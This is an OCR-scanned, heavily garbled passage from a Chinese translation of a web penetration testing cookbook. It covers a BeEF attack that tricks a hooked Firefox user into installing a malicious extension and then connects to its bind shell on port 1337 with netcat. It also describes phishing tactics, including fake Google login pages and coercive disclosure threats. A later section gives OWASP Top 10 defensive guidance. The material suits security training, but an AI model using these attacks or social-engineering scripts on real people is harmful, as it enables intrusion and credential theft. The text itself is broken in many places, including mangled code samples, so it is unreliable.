我 们 需要 为 这 个 秘籍 在 Windows 客户 端 安装 Firefox 。 
IRAE JE 

1. HÈ BeEF 服务 。 在 root 终端 下 ， 输 入 下 列 命 


cd /usr/share/beef -xss/ 
./ beef 


2. 我 们 会 使 用 BeEF 的 高 级 演示 页 面 来 勾 住 我 们 的 客户 端 。 在 Windows X P 3 VM 中 ， 打 


开 Flrefox 并 浏览 nttp://192.168.56.1:3000/demos/butcher/index.html ° 


义 住 的 浏览 器 。 


 Hooked Browsers 
4 | jOnline Browsers 
4 CC 192 16B. 56.1 
e $a 15» 15856 102 
& $8 15216856 102 


3. 现在 ， 登 录 BeEF 的 面板 ( http://127.0.0.1:3000/ui/panel ) 。 我 们 必须 在 这 里 查看 新 


Getting Started *'| Logs Current Browser 



































Details | Logs | Commands | Fider XssPays | pec Ferwork 


3 Category: Browser [7 Iers ] 


Browser Mame: Frelox 


à —jJOtflne Browsers 


i Browser Version. 338 
e 3. 115855101 


Browser UA Sting: llozila/5.0 (Windows NT 6.1; WOW; rv:38 0) Geckar/20 100101 Firetaxr38.0 
Browser Language: nl 

Browser Platform: Win2 

Browser Plugins: Shockwave Fash-v.18.0 0.194 

Window Size: Wichh: /52, Height: 451 


3 Category: Browser Components [17 Items | 





Flash: Yes 
VBScript: Ho 


4， 选 项 被 色 住 的 Flrefox 并 访 


l|] current Browser | Commands | Social Engineering | Firefox Extension (Bindshell) ° 
| Getting Started di Lags | Current Browser 


| Detxwis | Logs Commiands Rider XssPays pee | Metwork | 
一 一 一 —— 一 | 





















































bind | i. date lahel Description Create on the fiy a malicious Firefox extension that binds a 
a (Debug (1) 0 2015-1.. command shel to a specified port. 
D Test HTTP Bind Paw 0008 1 The extension is based on the original work from Michael 
4 C3 Exploits (3) ett ldetasplait module, and Joev's Firetox puram 
à —jJBeEF hind (3) 
D Active Fax 5.01 cisco HTI4L5 Rendering Enhancement 
D BeEF bind shell 
ib Eudora lilail 3 Extension fie — HTHILS Enhancements 
z (APN name: 
4 EPEC (2) 
i$ Bindshel (POSIX) Limen Part 1337 
D Bindshel (Windows) 
à Soal Engineering (1) 
B Firefox Extension (Bindshell] 


由 于 它 被 标 为 橙色 (命令 模块 对 目标 工作 ， 但 是 可 能 对 用 户 可 见 ) ， 我 们 可 能 需要 利用 
社会 工程 来 使 用 户 接受 扩展 。 


5. 我 们 需要 发 送 叫 做 HTML5 Rendering Enhancements 的 扩展 给 用 户 ， 它 会 通过 1337 端口 打 
开 shell ° È Execute 来 加 载 攻 击 。 


6. 在 客户 端 ，Firefox 会 询问 许可 来 安装 插件 并 接受 它 。 


7. 之后， 如果 Windows 防火 墙 打 开 了 ， 它 会 询问 许可 来 让 插件 访问 网 络 ， 选 


择 Allow access ? 


Windows Firewall has blocked some features of LogMeIn Rescue on all public and private 


g ) s 
Publisher: Mozilla Corporation 


Path: C:program files (x86) mozilla firefox Mfirefox. exe 


networks 


Allow LogMeIn Rescue to communicate on these networks: 


Private networks, such as my home or work network 


Public networks, such as those in airports and coffee shops (not recommended 
because these networks often have litte or no security) 


By Allow access 





最 后 两 个 步骤 高 度 依 赖 于 社会 工程 ， 说 服用 户 信任 这 个 插件 值得 安装 和 授权 。 


8， 现 在， 我 们 应 该 拥有 了 等 待 连接 1337 端口 的 的 客户 端 。 在 Kali 中 打开 终端 并 连接 到 它 
(我 们 这 里 是 192.168.56.102) 。 


nc 192.168.56.102 1337 
JUTCISUEAIETR DATAE CIT nc 102 1337 


volume ın drive © has no Label 
Volume Serial Number 1s COOA- 56A9 


Directory of C:XProgram Files (x86)XMozilla Firefox 


30 p.m. <Dl Rs 
98:50 p.m. <DIR> ia 
p.m. 20, 592 Aci .dLL 
:16 p.m. — app 
HEVEOM 109, 680 ". dll 


58:50 p.m. DI Rs rowser 
EN 2B3,248 crashreporter.exe 
/05/2015 09:31 p.m. 4,262 crashreporter.ini 
/05/2010 12:41 p.m. 2,106,216 D3DCompiler 43.dll 
1/08/2013 "03 p.M. p 466,856 d3dcompi ler 47.dll 
"2015 08:50 p.m. «DIR» defaults 
7/2015 06:53 p.m. 53 dependentlibs. Li 


.1 St 
2015 08:50 p.m. DL R> dictionaries 
53/2015 07:12 p.m. 376,944 tirefox.exe 
/05/2015 07:12 p.m. 699 freebL3,chk 
"2015 07:12 p.m. 330, 854 freebl3.dll 
2/2015 08:50 p.m. DI Rs gmp-clearkey 
95/2015 07:12 p.m. 0,397,296 1c udt52.dll 





现在 我 们 就 连接 到 了 客户 端 并 能 够 在 里 面 执 行 命令 。 


工作 原理 


一 旦 客户 端 被 BeEF 勾 住 ， 它 就 会 像 浏览 器 发 送 请 求 (通过 hook.js ) 来 下 载 扩 展 。 一 旦 下 
载 宛 成 ， 就 取决 于 用 户 是 否 安 装 。 


像 之 前 所 说 的 那样 ， 这 个 攻击 高 度 a ， 这 取决 于 我 们 通过 社会 工程 手 
段 说 服用 户 ， 使 之 相信 必须 安装 扩展 。 这 可 以 通过 页 面 上 的 文本 来 完成 ， 比 如 说 解锁 一 些 浏 
览 器 的 实用 功能 非常 必要 o 


在 用 户 安装 扩展 之 后 ， 我 们 只 需要 使 用 Netcat 来 连接 端口 1337， 并 开始 执行 命令 。 


9.6 诱 使 用 户 访问 我 们 的 仿造 站 点 


次 社会 工程 攻击 的 成 功 依 赖 于 攻击 者 说 服用 户 的 能 力 ， 以 及 用 户 亲 特攻 击 者 指令 的 意愿 。 
个 秘籍 是 一 系列 攻击 者 所 使 用 的 情景 和 技巧 ， 用 于 利用 它们 的 优势 使 用 户 更 加 信任 并 抓 住 
们 。 


这 一 节 中 ， 我 们 会 看 到 一 些 在 前 面 那 些 安全 评估 中 能 够 生效 的 攻击 。 它 们 针对 拥有 一 定 等 级 


的 安全 


1. 


意识 ， 并 且 不 会 陷入 “银行 账户 更 新 "骗局 的 用 户 。 


做 你 自己 的 作业 : 如 果 是 个 钓鱼 攻击 ， 做 一 次 关于 目标 的 彻底 调查 : 社会 网 络 、 论 坛 、 
博客 、 以 及 任何 能 够 告诉 你 目标 信息 的 信息 员 。Maltego 包含 在 Kali 中 ， 可 能 是 用 于 这 
个 任务 的 最 佳 工 具 。 之 后 基于 这 些 编造 一 个 借口 (伪造 的 故事 ) 或 者 一 个 攻击 主题 。 


我 们 发 现 了 一 些 客户 的 雇员 ， 他 们 在 Facebook 主页 上 发 送 大 量 图 片 、 视 频 和 文本 。 我 
们 从 她 的 页 面 上 收集 了 一 些 内 容 并 构建 了 幻灯 片 演 示 ， 它 也 包含 客户 电脑 的 远程 执行 利 
用 ， 我 们 将 它 通过 邮件 发 送 她 。 


创建 争论 : 如 果 目 标 是 个 某 领域 中 的 意见 领袖 ， 使 用 他 自己 的 名 言 ， 使 它们 对 你 说 的 东 
西 感 兴趣 ， 这 也 会 有 帮助 。 


我 们 被 雇佣 来 执行 革 个 金融 公司 的 渗透 测试 ， 协 约 条 款 包括 了 社会 工程 。 我 们 的 目标 是 
个 经 济 和 金融 圈 内 的 知名 人 士 。 他 在 知名 的 杂志 上 撰 稿 ， 做 讲座 ， 出 现在 经 济 新 闻 上 ， 
以 及 其 它 。 我 们 的 团队 做 了 一 些 关于 他 的 研究 ， 并 从 经 济 杂 志 的 网 站 上 获得 了 一 篇 文 
章 。 这 篇 文章 包含 他 的 公司 〈 我 们 的 罕 户 ) 的 电子 邮件 。 我 们 寻找 了 关于 文 草 的 更 多 信 
息 ， 并 发 现 其 它 站 点 上 的 一 些 评论 和 引用 。 我 们 利用 这 些 杜撰 了 一 个 电子 邮件 ， 说 我 们 
有 一 些 关于 文章 的 评论 ， 在 消息 中 给 出 摘要 ， 并 使 用 短 链 接 来 链接 到 Google Drive 的 一 
Tq SEP ES 


短 链接 让 用 户 访问 伪造 的 Google 登录 页 面 ， 它 由 我 们 控制 ， 并 允许 我 们 获取 他 同事 的 邮 
tre RA o 

说 出 你 是 谁 : 好 吧 ， 这 并 不 准确 。 如 果 你 说 “我 是 个 安全 研究 员 ， 在 你 的 系统 中 发 现 了 一 
些 东 西 "， 可 能 对 于 开发 者 和 系统 管理 员 是 个 很 好 的 钩子 。 


在 其 它 场景 中 ， 我 们 需要 明确 公司 中 的 社会 工程 师 和 系统 管理 员 。 首 先 ， 我 们 不 能 在 网 
上 发 现任 何 关 于 他 的 有 用 信息 ， 但 是 可 以 在 公司 的 网 站 上 发 现 一 些 漏洞 。 我 们 使 用 它 来 
向 我 们 的 目标 发 送 邮 件 ， 并 说 我 们 在 公司 的 服务 器 上 发 现 了 一 些 重 要 的 漏洞 ， 我 们 可 以 
帮 你 修复 它们 ， 附 上 一 张 图 作为 证 据 ， 以 及 Google Drive 文档 的 链接 ( 另 一 个 伪造 登录 
Wd) 。 


4. 固执 与 世人 迫 : 有 时 候 你 不 会 在 首次 尝试 的 时 候 就 收 到 答复 ， 这 时 总 是 要 分 析 结 果 -- 目标 
是 否 点 击 了 链接 ， 目 标 是 否 提交 了 伪造 信息 ， 以 及 判断 是 否 


我 们 没有 从 系统 管理 员 那 里 收 到 该 场景 的 答复 ， 页 面 也 没有 人 浏览 。 所 以 我 们 发 送 第 
个 邮件 ， 带 有 PDF “完整 报告 ， 并 说 如 果 我 们 没有 收 到 答复 ， 就 公布 漏洞 。 Ep 
ITA o 


5. 使 你 自己 更 加 可 信 : ARI o ARRA A ERSE ^ HRAS E EN RS o RR 1] 
公司 发 送 邮 件 ， 使 用 公司 的 Logo， 为 你 的 伪造 站 点 获得 一 个 免费 的 ,tk 或 .co.nf 7X 
名 ， 花 费 一 些 时 间 来 设计 或 正确 复制 目标 站 点 ， 以 及 其 它 。 


盗 取 信用 卡 数据 的 人 所 使 用 的 技巧 非 第 通用 ， 它 们 使 用 信用 卡号 码 的 一 部 分 ， 后 面 党 有 
星 号 ， 发 送 “ 你 需要 更 新 你 的 信息 "邮件 (的 变 体 ) 。 


正常 e iii 文 样 写 :“ 你 的 信用 卡 eee 0 0 3241 的 信息 ”， 但 是 伪造 信息 会 这 样 
E :“ 你 的 信用 卡 4916 **** sxxx **** 的 信息 "。 要 知道 前 四 位 (4916) Æ Visa Med" 
ii o 

工作 原理 

让 一 个 人 打开 来 自 完全 陌生 的 人 的 邮件 ， 阅 读 它 ， 并 点 击 它 包含 的 链接 ， 以 及 提供 页 面 上 的 


| EX — TIERE a 
击 的 关键 是 创造 一 种 感觉 ， 让 党 害 者 觉得 攻击 者 在 为 它 做 一 些 好 事 或 必要 的 事情 ， 也 要 创造 
一 种 急迫 感 ， 即 用 户 必 须 快速 回复 否则 会 丢失 重要 的 机 会 。 


P 


Re olbidiqequ olo s 上 的 提 权 。 如 果 你 获得 了 服务 器 的 访问 ， 但 是 没有 继续 
行动 的 空间 ， 你 可 能 需要 在 你 的 攻击 主机 上 开 尼 而 已 服务 器 ， 并 在 目标 上 浏览 它 。 上 所 以 你 可 
以 利用 其 它 类 型 的 漏洞 ， 并 执行 特权 命令 。 


第 十 章 OWASP Top 10 的 预防 
作者 : Gilberto Najera-Gutierrez 
译 者 : 飞龙 


协 仅 : CC BY-NC-SA 4.0 
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向 介 
每 个 渗透 测试 的 目标 都 是 识别 应 用 、 服 务 器 或 网 络 中 的 可 能 缺陷 ， 它 们 能 够 让 攻击 者 有 机 会 
获得 敏感 系统 的 信息 或 访问 权限 。 检 测 这 类 漏洞 的 原因 不 仅仅 是 了 解 它们 的 存在 以 及 推断 出 
其 中 的 漏洞 ， 也 是 为 了 努力 预防 它们 或 者 将 它们 降 至 最 小 。 


这 一 章 中 ， 我 们 会 观察 一 些 如 何 预防 多 数 Web 应 用 漏洞 的 例子 和 推荐 ， 根 据 OWASP : 


https://www.owasp.org/index.php/Category:OWASP Top Ten Project 


A1 预防 注入 攻击 


根据 OWASP > Web 应 用 中 发 现 的 最 关键 的 漏洞 类 型 就 是 一 些 代码 的 注入 攻击 ， 例 如 SQL X 
入 、OS 命令 注入 、HTML 注入 (XSS) 。 


这 些 漏洞 通 第 由 应 用 的 弱 输 入 校 验 导 致 。 这 个 秘籍 中 ， 我 们 会 设计 一 些 处 理 用 户 输入 和 构造 
所 使 用 的 请 求 的 最 佳 实践 。 


TRE y HR 


1. 为 了 防止 注入 攻击 ， 首 先 需 要 合理 校 验 输 入 。 在 服务 端 ， 这 可 以 由 编写 我 们 自己 的 校 验 
流程 来 实现 ， 但 是 最 佳 选择 是 使 用 语言 和 目 己 的 校 验 流程 ， 因 为 它们 更 加 广泛 使 用 并 测试 
过 。 一 个 极 好 的 激励 就 是 PHP 中 的 filter_var ， 或 者 ASP.NET 中 的 校 验 助 手 。 例 
如 ，PHP 中 的 邮箱 校 验 类 似 于 : 





function isValidEmail($email){ 
return filter_var($email, FILTER VALIDATE EMAIL); 
j 


2， 在 客户 端 ， 检验 可 以 由 创建 JavaScript 校 验 函数 来 完成 ， 使 用 正则 表达 式 。 例 如 ， 邮 箱 
检验 流程 是 : 


function isValidEmail (input) ( 
var result-false; 
var email regex = /^[a-zA-Z0-9. -]*G([a-zA-Z0-9.-]*N.)*[azA-Z0-9.-](2,41$7; 
if ( email regex.test(input) ) { 
result - true; 
j 


return result; 


3. «T SQL 注入 ， 避 免 拼 接 输 入 值 为 查询 十 分 关键 。 反 之 ， 使 用 参数 化 查询 。 每 个 编程 语 
言 都 有 其 自己 的 版 本 : 


PHP MySQLLi : 


$query = $dbConnection-»prepare('SELECT * FROM table WHERE name = ?'); 
$query-»bind param('s', $name); 
$query-»execute(); 


CH: 


string sql = "SELECT * FROM Customers WHERE Customerrid = @ CustomerId"; 

SqlCommand command = new SqlCommand(sql); command.Parameters.Add(new SqlParameter( 
"QCcustomerId", System. Data.SqlDbType.Int)); 
command.Parameters["QCustomerId"].Value = 1; 


Java : 


String custname = request.getParameter("customerName"); 

String query = "SELECT account balance FROM user data WHERE user name =? "; 
PreparedStatement pstmt = connection.prepareStatement( query ); 
pstmt.setString( 1, custname); 

ResultSet results - pstmt.executeQuery( ); 


4. 考虑 注入 出 现 的 时 机 ， 对 减少 可 能 的 损失 总 量 也 有 帮助 。 所 以 ， 使 用 低 权 限 的 系统 用 户 
来 运行 数据 库 和 Web 服务 器 。 


5. 确保 输入 用 于 连接 数据 库 服务 器 的 用 户 不 是 数据 库 管 理 员 


Oo 


6. 和 茶 用 甚至 删除 允许 攻击 者 执行 系统 命令 或 提 权 的 储存 过 程 ， 例 如 MSSQL 服务 器 中 
的 xp cmdshell 9? 


工作 原理 


预防 任何 类 型 代码 注入 攻击 的 主要 部 分 永远 是 合理 的 输入 校 验 ， 位 于 服务 端 也 位 于 客户 端 o 


对 于 SQL 注入 ， 始 终 使 用 参数 化 或 者 预 编译 查询 。 而 不 是 拼接 SQL 语 扣 和 输入 。 参 数 化 查 
询 将 函数 参数 插入 到 SQL 语句 特定 的 位 置 ， 消 除了 程序 员 通 过 拼接 构造 查询 的 需求 。 


这 个 秘籍 中 ， 我 们 使 用 了 语言 内 建 的 校 验 函数 ， 但 是 如 果 你 需要 校 验 一 些 特殊 类 型 的 参数， 
你 可 以 通过 使 用 正则 衣 达 式 创建 自己 的 版 本 。 


除了 执行 正确 校 验 ， 我 们 也 需要 在 一 些 人 普 意 注入 一 些 代码 的 情况 下 ， 降 低 沦 陷 的 影响 。 这 
可 以 通过 在 操作 系统 的 上 下 文中 为 Web 服务 器 合理 配置 用 户 权 限 ， 以 及 在 数据 库 服 务 器 上 下 
文中 配置 数据 库 和 OS 来 实现 。 


j 见 
对 于 数据 校 验 来 讲 ， 最 有 用 的 工具 就 是 正则 表达 式 。 在 处 理 和 过 滤 大 量 信 息 的 时 候 ， 它 们 也 
能 够 让 渗透 测试 变 得 更 容易 。 所 以 好 好 了 解 它们 很 有 必要 。 我 推荐 你 查看 一 些 站 点 : 


e http://www.regexr.com/ 一 个 很 好 的 站 点 ， 其 中 我 们 可 以 获得 示例 和 参数 并 测试 我 们 自己 
的 表达 式 来 查看 是 否 有 字符 串 匹 配 。 


e http://www.regular-expressions.info 它 包 含 教 程 和 实例 来 了 解 如 何 使 用 正则 表达 式 。 它 也 
有 一 份 实用 的 参考 ， 关 于 主流 语言 和 工具 的 特定 实现 。 


e http://www.princeton.edu/~mlovett/reference/Regular-Expressions.pdf (Jan Goyvaerts 
编写 的 《Regular Expressions, The Complete Tutorial) ) 就 像 它 的 标题 所 说 ， 它 是 个 正 
则 表达 式 的 非 第 完备 的 脚本 ， 包 含 许多 语言 的 示例 。 


A2 构建 合理 的 身份 验证 和 会 话 管 理 


带 有 缺陷 的 身份 验证 和 会 话 管理 是 当今 Web 应 用 中 的 第 二 大 关键 的 漏洞 。 


身份 验证 是 用 户 证 明 它 们 是 它们 所 说 的 人 的 过 程 。 这 通常 通过 用 户 名 和 密码 来 完成 。 一 些 该 
领域 的 常见 缺陷 是 宽松 的 密码 策略 ， 以 及 隐藏 式 的 安全 (隐藏 资源 缺乏 身份 验证 ) 。 


会 话 管理 是 登录 用 户 的 会 话 标识 符 的 处 理 。 在 Web 服务 器 中 ， 这 可 以 通过 实现 会 话 Cookie 
和 标识 来 守成。 这些 标识 符 可 以 植 入 、 资 取 ， 或 者 由 攻击 者 使 用 社会 工程 、XSS 或 CSRF 
来 “ 动 持 ”。 所 以 ， 开 发 者 必须 特别 注意 如 何 管理 这 些 信 息 。 


这 个 秘籍 中 ， 我 们 会 设计 到 一 些 实现 用 户 名 /密码 身份 验证 ， 以 及 管理 登录 用 户 的 会 话 标识 符 
的 最 佳 实践 。 


TRE y HR 


1， 如 果 应 用 中 存在 只 能 由 授权 用 户 查看 的 页 面 、 表 单 或 者 任何 信息 片段 ， 确 保 在 展示 它们 
之 前 存在 合理 的 身份 验证 。 


2， 确 保 用 户 名 、ID、 客 码 和 所 有 其 它 身 份 验 证 数据 是 大 小 写 敏感 的 ， 并 且 对 每 个 用 户 唯 


— OO 


3， 建 立 强 密码 策略 ， 强 迫 用 户 创 建 至 少 满足 下 列 条 件 的 密码 : 


10. 


o 对 于 8 个 字符 ， 推 荐 10 个 。 

o 使 用 大 写 和 小 写字 母 。 

o 至 少 使 用 一 个 数字 。 

o 至 少 使 用 一 个 特殊 字符 (空格 、! 、& 、# 、% ， 以 及 其 它 ) 。 

o 禁止 用 户 名 、 站 点 名 称 、 公 司 名 称 或 者 它们 的 变 体 (大 小 写 转 换 、133t、 它 们 的 片 
BR) 用 于 密码 。 

o 禁止 使 用 “常见 密码 "列表 中 的 密码 : https://www.teamsid.com/worst-passwords- 
2015/ ° 

o 永远 不 要 显示 用 户 是 否 存在 或 者 信息 格式 是 否 正确 的 错误 信息 。 对 不 正确 的 登录 请 
求 、 不 存在 的 用 户 、 名 称 或 密码 不 匹配 模式 、 以 及 所 有 可 能 的 登录 错误 使 用 相同 的 
泛 化 信息 。 这 种 信息 类 似 于 : 


登录 数据 不 正确 。 
用 户 名 或 锋 码 无 效 。 
访问 茶 止 。 


密码 不 能 以 纯 文 本 格式 储存 在 数据 库 中 。 使 用 强 哈 布 算法 ， 例 如 SHA-2、scrypt、 或 者 
bcrypt， 它 们 特别 为 难以 使 用 GPU 破解 而 设计 。 


在 对 比 用 户 输 入 和 密码 时 ， 计 算 输 入 的 哈 币 之 后 比较 哈 布 之 后 的 字符 串 。 永 远 不 要 解密 
移 码 来 使 用 纯 文 本 用 户 输 入 来 比较 。 


避免 基本 的 HTML. 身份 验证 。 

可 能 的 话 ， 使 用 多 因素 验证 (MFA) ， 这 意味 着 使 用 不 止 一 个 身份 验证 因素 来 登录 : 
o 一 些 你 知道 的 (账户 信息 或 密码 ) 

o 一 些 你 拥有 的 (标识 或 手机 号 ) 

o 一 些 你 的 特征 (生物 计量 ) 


如 果 可 能 的 话 ， 实 现 证 书 、 预 共 译 密 钥 、 或 其 它 无 需 帘 码 的 身份 校 验 协议 (OAuth2 ^ 
OpenID ` SAML ^ X FIDO) 。 

对 于 会 话 管理 ， 推 荐 使 用 语言 内 建 的 会 话 管理 系统 ，Java、ASPNET 和 PHP。 它 们 并 不 
完美 ， 但 是 能 够 确保 提供 设计 良好 和 广泛 测试 的 机 制 ， 而 且 比 起 开发 团队 在 时 间 紧 迫 情 
况 下 的 自制 版 本 ， 它 们 更 易于 实现 。 


始终 为 登录 和 登录 后 的 页 面 使 用 HTTPS -- 显然 ， 要 防止 只 接受 SSL fe TLS v1.1 连接 。 


为 了 确保 HTTPS 能 够 生效 ， 可 以 使 用 HSTS。 它 是 由 Web 应 用 指定 的 双向 选择 的 特 

性 。 通 过 Strict-Transport-Security 协议 关 ， 它 在 http:// 存在 于 URL 的 情况 下 会 重 定 
向 到 安全 的 选项 ， 并 防止 无效 证 书信 息 的 覆 写 。 例 如 使 用 Burp Suite 的 时 候 会 出 现 的 情 
况 。 更 多 信息 请 见 : https://www.owasp.org/index.php/HTTP Strict Transport Security 


Oo 


12， 始 终 设置 HTTPOnly 和 安全 的 Cookie 属性 。 
19. 设置 最 少 但 实际 的 会 话 过 期 时 间 。 确 保 正 第 用 户 离 开 之 后 ， 攻 击 者 不 能 复 用 会 话 ， 并 且 
用 户 能 够 执行 应 用 打算 执行 的 操作 。 


工作 原理 


身份 校 验 机 制 通 第 在 Web 应 用 中 简化 为 用 户 名 / 冤 码 登录 页 面 。 虽 然 并 不 是 最 安全 的 选 
它 对 于 用 户 和 开发 者 最 简单 ， 以 及 当 密 码 被 盗 取 时 ， 最 重要 的 层面 就 是 它们 的 强度 。 


我 们 可 以 从 这 本 书 看 到 ， 密 码 强度 由 破解 难度 决定 ， 通 过 爆破 、 字 典 或 猜测 。 这 个 秘籍 的 第 
一 个 提示 是 为 了 使 密码 更 难以 通过 建立 最 小 长 度 的 混合 字 租 MEN ， 难 以 通过 排除 更 直觉 
的 方案 (用 户 名 、 常 见 密码 、 公 司 名 称 ) 来 猜测 ， 并 且 通 过 使 用 强 哈 希 或 加 密 储 存 ， 难 以 在 
泄露 之 后 破解 。 


对 于 会 话 管理 来 说 ， 过 期 时 间 、 唯 一 性 和 会 话 ID 的 强度 (已 经 在 语言 内 建 机 制 中 实现 ) ， 以 
及 Cookie 设置 中 的 安全 都 是 关键 的 考虑 因素 。 


谈论 身份 校 验 安全 的 最 重要 的 层面 和 是， 如 果 消 息 可 以 通过 中 间 人 攻击 拦截 或 者 服务 ， 没 有 任 
何 安 全 配置 、 控 制 或 强 均 码 征 尾 够 安全 的 。 所 以 ， 合 理 配 置 的 加 均 通 信 频 道 的 使 用 ， 例 如 
TLS， 对 保护 我 们 的 用 户 身份 数据 来 说 极其 重要 。 


j IL 


OWASP 拥有 一 些 非常 好 的 页 面 ， 关 于 身份 校 验 和 会 话 管理 。 我 们 推荐 你 在 构建 和 配置 Web 
应 用 时 间 读 并 仔细 考虑 它们 。 


e https://www.owasp.org/index.php/Authentication Cheat Sheet 
e https://www.owasp.org/index.php/Session Management Cheat Sheet 


A3 预防 路 站 脚本 


我 们 之 前 看 到 ， 跨 站 脚本 ， 在 展示 给 用 户 的 数据 没有 正确 编码 ， 并 且 浏 览 器 将 其 解释 并 执行 
为 脚本 代码 时 发 生 。 这 也 存在 输入 校 验 因素 ， 因 为 恶意 代码 通常 由 输入 变量 插入 。 


这 个 秘籍 中 ， 我 们 会 涉及 开发 者 所 需 的 输入 校 验 和 输出 编码 ， 来 防止 应 用 中 的 XSS 漏洞 。 


工作 原理 


1. 应 用 存在 XSS 漏洞 的 第 一 个 标志 是 ， 页 面 准 确 反 映 了 用 户 提供 的 输入 。 所 以 ， 尝 试 不 要 
使 用 用 户 提 供 的 信息 来 构建 输出 文本 。 


2， 当 你 需要 将 用 户 提 供 的 信息 放 在 输出 页 面 上 时 ， 校 验 这 些 数据 来 防止 任何 类 型 代码 的 插 
入 。 我 们 已 经 在 A1 中 看 到 如 何 实现 它 。 


3， 出 于 一 些 原因 ， 如 果 用 户 被 允许 输入 特殊 字符 或 者 代码 段 ， 在 它 插 入 到 输出 之 前 ， 过 滤 
或 合理 编码 文本 。 


4. 对 于 过 滤 ， 在 PHP 中 ， 可 以 使 用 filter var. 。 例 如 ， 如 果 你 想 让 字符 串 为 邮件 地 址 : 


$email = "john(.doe)Qexa//mple.com"; 
$email = filter var(S$email, FILTER SANITIZE EMAIL); 
echo $email; 


对 于 编码 ， 你 可 以 在 PHP 中 使 用 htmispecialchars 


$str = "The JavaScript HTML tags are «script» for opening, and </ script» for clo 
Samo 
echo htmlspecialchars(S$str); 


5. 在 .NET 中 ， 对 于 4.5 及 更 高 版 本 ， System.Web.Security.Antixss 命名 空间 提供 了 必要 的 
工具 。 对 于 .NET 框架 4 及 之 前 的 版 本 ， 你 可 以 使 用 Web 保护 
库 : http://wpl.codeplex.com/ ? 


6. 同样 ， 为 了 防止 储存 型 XSS， 在 储存 进 数据 库 或 从 数据 库 获取 之 前 ， 编 码 或 过 滤 每 个 信 
息 片 RE 2 


T. 不 要 忽略 关 部 、 标 题 、CSS 和 页 面 的 脚本 区 域 ， 因 为 它们 也 可 以 被 利用 。 


工作 原理 


除了 合理 的 输入 校 验 ， 以 及 不 要 将 用 户 输 入 用 作 输 出 信息 ， 过 滤 和 编码 也 是 防止 XSS 的 关键 
层面 。 


过 滤 意 味 着 从 字符 串 移 除 不 允许 的 字符 。 这 在 输入 字符 串 中 存在 特殊 字符 时 很 实用 。 


编码 将 特殊 字符 转换 为 HTML 代码 表示 。 例 如 ，& JJ eamp; ^ < RA alt; 。 一 些 应 用 允 
许 在 输入 字符 串 中 使 用 特殊 字符 ， 对 它们 来 说 过 滤 不 是 个 选择 。 所 以 应 该 在 将 输入 插入 页 
面 ， 或 者 储存 进 数 据 库 之 前 编码 输入 。 


j IL 


OWASP 拥有 值得 阅读 的 XSS 预防 速 查 表 : 


e https://www.owasp.org/index.php/XSS 9e28Cross Site Scripting9o29 Prevention Che 
at Sheet 


AA 避免 直接 引用 不 安全 对 象 


当 应 用 允许 攻击 者 (也 是 校 验 过 的 用 户 ) 仅仅 修改 请 求 中 的 ， 直 接 指向 系统 对 象 的 参数 值 ， 
来 访问 男 一 个 未 授权 的 对 象 时 ， 就 存在 不 安全 对 象 的 直接 引用 ODOR) 。 我 们 已 经 在 本 地 文 
件 包 含 和 目录 遍历 漏洞 中 看 到 了 一 些 例 子 。 


VS OWAEP 7 IBOR Wo 
现 ， 或 者 "隐藏 式 安全 "策略 (如 果 用 户 不 能 看 到 它 ， 他 们 就 不 能 知道 它 的 存在 ) 导致 。 这 些 
没有 经 验 的 开发 者 之 中 是 个 常见 的 做 法 。 


此 在 


这 个 秘籍 中 ， 我 们 会 涉及 在 设计 访问 控制 机 制 时 应 该 考虑 的 关键 层面 ， 以 便 预 防 IDOR 7& 


v 
(m. (0) 
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1. 使 用 非 直 接 引 用 优 于 让 接 引 用 。 例 如 ， 不 要 通过 参数 中 的 名 称 来 引用 页 面 
URL?page-"restricted page" ) ? 而 是 要 创建 索引 并 在 内 部 处 理 它 
( URL?page-2 ) ° 


2. 将 非 直 接 引 用 映射 到 用 户 (会 话 ) 层面 ， 于 是 用 户 仅 仅 能 够 访问 授权 的 对 象 ， 即 使 它们 
修改 了 下 标 。 


3. 在 传递 相应 对 象 之 亨 校 验 引 用 ， 如 果 请 求 的 用 户 没 有 权限 来 访问 ， 展 示 通 用 错误 页 面 。 

4， 输 入校 验 也 是 很 重要 的 ， 尤 其 是 目录 遍历 和 文件 包含 的 情况 下 。 

5 永远 不 要 采取 “隐藏 式 安全 "的 策略 。 如 果 有 些 文件 包含 受 限 的 信息 ， 即 使 它 没 有 引用 ， 有 
些 人 也 会 把 它 翻 出 来 。 


工作 原理 


不 安全 对 象 的 直接 引用 在 Web 应 用 中 的 表现 形式 有 所 不 同 ， 从 目录 遍历 到 敏感 的 PDF 文档 
的 引用 。 但 是 它们 的 大 多 数 都 依赖 于 一 个 假设 ， 即 用 户 永 远 不 会 找到 方法 来 访问 不 能 显 式 访 
问 的 东西 。 


为 了 防止 这 种 漏洞， 需要 在 设计 和 开发 期 间 执行 一 些 积极 操作 。 设 计 可 靠 授权 机 制 ， 来 验证 
尝试 访问 一 些 信息 的 用 户 的 关键 是 ， 是 否 用 户 站 正人 允许 访问 它 


将 引用 对 象 映射 为 下 标 来 避免 对 象 名 称 和 直接 用 于 参数 值 〈 就 像 LFI 中 的 那样 ) 是 第 一 步 。 攻 
击 者 也 可 以 修改 下 标 ， 这 很 正 第 ， 就 像 对 对 象 名 称 所 做 的 那样 。 但 是 数据 库 中 存在 下 标 - 对 边 
的 表 的 话 ， 添 加 衬 段 来 规定 访问 所 需 的 权限 级 别 ， 比 起 没有 任何 表 并 且 直 接 通 过 名 称 来 访问 


RC XE 
之 前 说 过 ， 下 标的 表 可 能 包含 访问 对 次 所 需 的 权限 级 别 ， 更 加 严格 的 话 还 有 拥有 者 的 ID。 所 
以 ， 它 只 能 够 在 请 求 用 户 是 拥有 者 的 情况 下 访问 。 


最 后 ， 输 入 校 验 必须 存在 于 Web 应 用 安全 的 每 个 层面 。 


A5 基本 的 安全 配置 指南 


系统 的 默认 配置 ， 包 括 操作 系统 和 Web 服务 器 ， 多 数 用 于 演示 和 强调 他 们 的 基本 或 多 数 有 关 
特性 ， 并 不 能 保护 它们 不 被 攻击 。 


一 些 常 见 的 可 能 使 系统 沦陷 的 默认 配置 ， 是 数据 库 、 Web 服务 器 或 CMS 安装 时 创建 的 默认 管 
理 员 账户 ， 以 及 默认 管理 员 页 面 、 默 认 栈 回溯 错误 信息 ， 以 及 其 它 。 


这 个 秘籍 中 ， 我 们 会 涉及 OWASP Top 10 中 第 五 大 关键 漏洞 ， 错 误 的 安全 配置 。 


操作 步骤 


1， 可 能 的 话 ， 删 除 所 有 管理 员 应 用 ， 例 如 Joomla 的 admin * WordPress 的 admin > 
